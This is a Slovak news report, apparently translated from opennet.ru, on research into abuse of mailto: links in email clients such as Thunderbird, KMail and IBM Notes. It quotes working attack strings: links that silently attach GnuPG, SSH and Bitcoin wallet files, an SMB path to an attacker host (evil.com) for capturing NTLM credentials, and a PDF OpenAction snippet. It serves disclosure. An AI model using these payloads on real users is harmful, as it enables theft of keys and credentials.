Výskumníci z Ruhr University Bochum (Nemecko) () správanie poštových klientov pri spracovaní odkazov „mailto:“ s pokročilými parametrami. Päť z dvadsiatich skúmaných e-mailových klientov bolo zraniteľných voči útoku, ktorý manipuloval s náhradou zdrojov pomocou parametra „attach“. Ďalších šesť e-mailových klientov bolo zraniteľných voči útoku výmeny kľúčov PGP a S/MIME a traja klienti boli zraniteľní voči útoku na extrahovanie obsahu zašifrovaných správ.
Odkazy «sa používajú na automatizáciu otvorenia e-mailového klienta za účelom napísania listu adresátovi uvedenému v odkaze. Okrem adresy môžete ako súčasť odkazu zadať ďalšie parametre, ako napríklad predmet listu a šablónu pre typický obsah. Navrhovaný útok manipuluje s parametrom „attach“, ktorý vám umožňuje pripojiť prílohu k vygenerovanej správe.
Poštoví klienti Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) a Pegasus Mail boli zraniteľní voči triviálnemu útoku, ktorý vám umožňuje automaticky pripojiť akýkoľvek lokálny súbor, zadaný prostredníctvom odkazu ako „mailto:?attach=cesta_k_súboru“. Súbor je priložený bez zobrazenia upozornenia, takže bez osobitnej pozornosti si používateľ nemusí všimnúť, že list bude odoslaný s prílohou.
Napríklad pomocou odkazu ako „mailto:[chránené e-mailom]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg“ môžete do listu vložiť súkromné kľúče z GnuPG. Môžete tiež odoslať obsah krypto peňaženiek (~/.bitcoin/wallet.dat), kľúče SSH (~/.ssh/id_rsa) a akékoľvek súbory prístupné používateľovi. Okrem toho vám Thunderbird umožňuje pripojiť skupiny súborov maskou pomocou konštrukcií ako „attach=/tmp/*.txt“.
Niektorí e-mailoví klienti okrem lokálnych súborov spracúvajú aj odkazy na sieťové úložisko a cesty na serveri IMAP. IBM Notes vám predovšetkým umožňuje preniesť súbor zo sieťového adresára pri spracovaní odkazov, ako je „attach=\\evil.com\dummyfile“, ako aj zachytiť parametre autentifikácie NTLM odoslaním odkazu na server SMB kontrolovaný útočníkom. (požiadavka bude odoslaná s aktuálnymi parametrami autentifikácie užívateľa).
Thunderbird úspešne spracováva požiadavky ako „attach=imap:///fetch>UID>/INBOX>1/“, ktoré vám umožňujú pripojiť obsah z priečinkov na serveri IMAP. Zároveň správy získané z IMAP, zašifrované cez OpenPGP a S/MIME, poštový klient pred odoslaním automaticky dešifruje. Vývojári Thunderbirdu boli o probléme vo februári a vo vydaní problém už bol odstránený (vetvy Thunderbirdu 52, 60 a 68 zostávajú zraniteľné).
Staré verzie Thunderbirdu boli tiež zraniteľné voči dvom ďalším variantom útoku na PGP a S/MIME, ktoré navrhli výskumníci. Najmä Thunderbird, ako aj OutLook, PostBox, eM Client, MailMate a R2Mail2, boli vystavené útoku výmeny kľúča, ktorý bol spôsobený tým, že poštový klient automaticky importuje a nainštaluje nové certifikáty prenášané v správach S/MIME, čo umožňuje útočníkovi organizovať náhradu verejných kľúčov už uložených používateľom.
Druhý útok, na ktorý sú náchylné Thunderbird, PostBox a MailMate, manipuluje s funkciami mechanizmu na automatické ukladanie konceptov správ a umožňuje pomocou parametrov mailto iniciovať dešifrovanie zašifrovaných správ alebo pridanie digitálneho podpisu pre ľubovoľné správy. následný prenos výsledku na IMAP server útočníka. Pri tomto útoku sa šifrovaný text prenáša cez parameter „body“ a značka „meta refresh“ sa používa na začatie hovoru na útočníkov server IMAP. Napríklad: ' '
Na automatické spracovanie odkazov „mailto:“ bez interakcie používateľa možno použiť špeciálne navrhnuté dokumenty PDF – akcia OpenAction v PDF vám umožňuje automaticky spustiť obslužný program mailto pri otvorení dokumentu:
%PDF-1.5
1 0 obj
<< /Typ /Katalóg /Otvorená akcia [2 0 R] >>
endobj
2 0 obj
<< /Typ /Akcia /S /URI/URI (mailto:?body=——ZAČIATOK SPRÁVY PGP——[…])>>
endobj
Zdroj: opennet.ru